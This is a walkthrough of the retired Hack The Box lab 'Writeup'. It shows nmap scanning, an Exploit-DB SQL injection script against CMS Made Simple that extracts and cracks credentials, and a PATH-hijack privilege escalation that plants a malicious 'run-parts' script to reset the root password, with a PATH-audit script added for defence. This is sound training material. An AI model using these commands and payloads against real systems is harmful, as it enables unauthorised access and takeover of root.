Today, we're sharing another Hack Challenge Walkthrough box: Writeup. The machine is part of the retired lab, so you can connect to it using your HTB VPN and then start to solve the CTF.
Level of the lab: Beginner to intermediate.
Task: Capture the user.txt and root.txt flags.
Pentesting Methodology
Network scanning
· Nmap
Enumeration
· Web source code
Exploit
· Unauthenticated SQL injection
Privilege Escalation
· PATH environment
Network Scanning
As we know the victim machine's IP, we can start with an nmap scan to identify the open ports and the services running on it.
nmap -A 10.10.10.138
From this scan result, we found that port 80 is open and that a /writeup/ entry is disclosed in robots.txt. Besides, port 22 is also open for SSH.
Enumeration
So we opened the victim IP in the web browser and were welcomed by the web page shown in the image below.
Then we explored the URL below to examine /writeup, as enumerated above.
It was a simple web page where we didn't find any remarkable clue, so we decided to check the source code of the page.
Well, thankfully, we found the description of the CMS used to build the website inside the source code.
Without any delay, we googled for "CMS Made Simple 2019 exploit" and fortunately found the Exploit-DB entry for the SQL injection vulnerability.
Exploit
We downloaded the Python script from Exploit-DB and gave it full permission. Once everything was set, we ran the following command to obtain the credentials from inside the database by exploiting the unauthenticated SQL injection.
python 46635.py -u http://10.10.10.138/writeup/ --crack -w /usr/share/wordlists/rockyou.txt
As a result, we found the salt value, username, email address, password hash and the cracked password.
Since we had found the login credentials, we could use them to access the SSH shell.
ssh jkr@10.10.10.138
Booom!! We successfully got a shell on the host machine and found the user.txt file, as shown in the image below. Now it was time to obtain a higher-privileged shell by escalating the privileges of the user jkr.
Privilege Escalation
It was time for post-exploitation enumeration to discover the hidden processes running on the host machine. We tried to enumerate services running as root that could be abused; to do this we used pspy64 to identify the running processes, because the manual approach failed to reveal all processes running in the background.
Therefore, we downloaded pspy64 to the host machine inside the /tmp directory, assigned it full permissions and ran it to identify the processes running on the machine.
cd /tmp
chmod 777 pspy64
./pspy64
So, we found that a suspicious process was underway, executing the following command:
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
Let's break this down to analyze what is going on at each stage.
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Here we see "sh -c /usr/bin/env -i" being used to create an empty environment and set only the PATH variable, in which you can observe that "/usr/local/sbin" is at the top, which means it is searched first (highest priority) whenever a command is looked up by name.
run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
This runs all the scripts in /etc/update-motd.d using run-parts and stores their combined output in /run/motd.dynamic.new. Note that run-parts is invoked by its bare name rather than an absolute path, so it is resolved through that PATH.
Interestingly, we found that the above command runs whenever jkr connects over SSH to access the server, so we can assume that every time we log in via SSH as jkr, the scripts will run by way of this command.
Thus we checked the permissions of /usr/local/sbin and noted that it is owned by root:staff, then checked the output of id and luckily found that jkr is a member of the staff group.
Since /usr/local/sbin is the first entry in the search path and our group can write to it, we can try to plant a malicious file inside /usr/local/sbin/ named run-parts.
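The condition just described (a root-run job resolving a command by name through a PATH whose earlier entries an unprivileged account can write to) is easy to audit before anyone abuses it. The following is an added example and not the author's code: a POSIX shell check that walks a PATH string in lookup order and reports every directory a given account could write to ahead of the real binary; the user name "jkr", the group list "jkr staff" and the PATH value are assumed from the post, and the check generalises to any command name and to owner, group and world write bits.

```shell
#!/bin/sh
# Added example, not code from the original post: audit a PATH string (such as
# the one the MOTD job above sets with "env -i PATH=...") for directories that
# an unprivileged account could write to AND that precede the directory holding
# the real command (here run-parts). Any such directory lets that account plant
# a same-named file that the root-run job would execute first.

# mode_bit MODESTRING POS -> character POS (1-based) of e.g. "drwxrwxr-x"
mode_bit() { printf '%s' "$1" | cut -c"$2"; }

# writable_by USER "GROUP LIST" DIR -> prints owner|group|world, or nothing.
writable_by() {
  user=$1 groups=$2 dir=$3
  set -- $(ls -ldL "$dir")     # POSIX ls -l fields: $1=mode $3=owner $4=group
  if [ "$3" = "$user" ] && [ "$(mode_bit "$1" 3)" = w ]; then
    echo owner
  elif [ "$(mode_bit "$1" 9)" = w ]; then
    echo world
  else
    case " $groups " in
      *" $4 "*) [ "$(mode_bit "$1" 6)" = w ] && echo group ;;
    esac
  fi
  return 0
}

# path_hijack_dirs CMD PATHSTRING USER "GROUP LIST"
# Walks PATHSTRING in lookup order and prints "<dir> <reason>" for every
# directory USER can write to before the real CMD is reached; returns 1 if any.
path_hijack_dirs() {
  cmd=$1 rest=$2: user=$3 groups=$4 found=0
  while [ -n "$rest" ]; do
    dir=${rest%%:*}; rest=${rest#*:}
    [ -n "$dir" ] && [ -d "$dir" ] || continue
    [ -x "$dir/$cmd" ] && break     # real binary reached: later dirs cannot shadow it
    reason=$(writable_by "$user" "$groups" "$dir")
    [ -n "$reason" ] && { echo "$dir $reason"; found=1; }
  done
  return $found
}

# Constructed input mirroring the walkthrough: the job's PATH, the account jkr
# and its groups (assumed to be jkr and staff). Run on the host to see the result.
path_hijack_dirs run-parts \
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin jkr "jkr staff" \
  || echo "a writable PATH entry precedes run-parts: PATH hijack possible"
```

On the Writeup box this reports /usr/local/sbin as group-writable for jkr; the fix on a real host is to make that directory writable by root only or to call run-parts by absolute path.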
So, on our local machine we wrote a script that changes the password of the root user and saved it as run-parts:
#!/bin/bash
echo "root:raj@123" | chpasswd
Then we served the file over HTTP with Python's built-in server so that it could be transferred to the host machine:
python -m SimpleHTTPServer
Let's download the malicious script to the host machine inside the /tmp directory, give it full permission and copy it to "/usr/local/sbin", as shown in the image below.
cd /tmp
chmod 777 run-parts
cp run-parts /usr/local/sbin
When everything is done, we need to log out and log in again via SSH as jkr so that our malicious script gets executed, as explained above.
ssh jkr@10.10.10.138
su root
cd /root
cat root.txt
Booom! Booom! We've got the root flag. As soon as you connect over SSH again, the MOTD process runs our malicious run-parts script, which modifies the root user's password; then you can switch user to root and grab the root.txt flag.